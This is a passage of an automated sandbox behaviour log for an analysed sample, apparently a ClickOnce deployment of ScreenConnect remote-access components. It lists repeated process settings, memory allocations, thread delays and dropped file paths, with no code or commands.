Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 27688670000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 276A1FE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Memory allocated: 860000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Memory allocated: 1A420000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Memory allocated: 16C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Memory allocated: 3120000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Memory allocated: 2F30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Memory allocated: 880000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Memory allocated: 1200000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Memory allocated: 3200000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Memory allocated: 2C00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Memory allocated: 1AD30000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599764 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599531 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599122 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598515 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598211 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598091 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597935 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597827 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597711 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597607 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597500 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597390 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597275 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597171 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597062 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596952 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596842 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596734 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596624 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596514 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596396 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596265 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596155 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 596045 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595928 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595812 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595627 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595498 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595375 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595263 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595155 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 595045 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594936 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594826 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594718 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594608 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594499 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594390 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594280 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594165 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 594061 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593952 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593843 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593731 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593621 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593515 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593405 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593296 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593186 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 593069 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 592963 Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Window / User API: threadDelayed 7489 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Window / User API: threadDelayed 2179 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll Jump to dropped file
Source: C:\Users\user\Desktop\96r3GgxntQ.exe TID: 7612 Thread sleep time: -40000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -34126476536362649s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -599874s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -599764s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -599531s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -599122s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -598515s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720 Thread sleep time: -598211s >= -30000s Jump to behavior
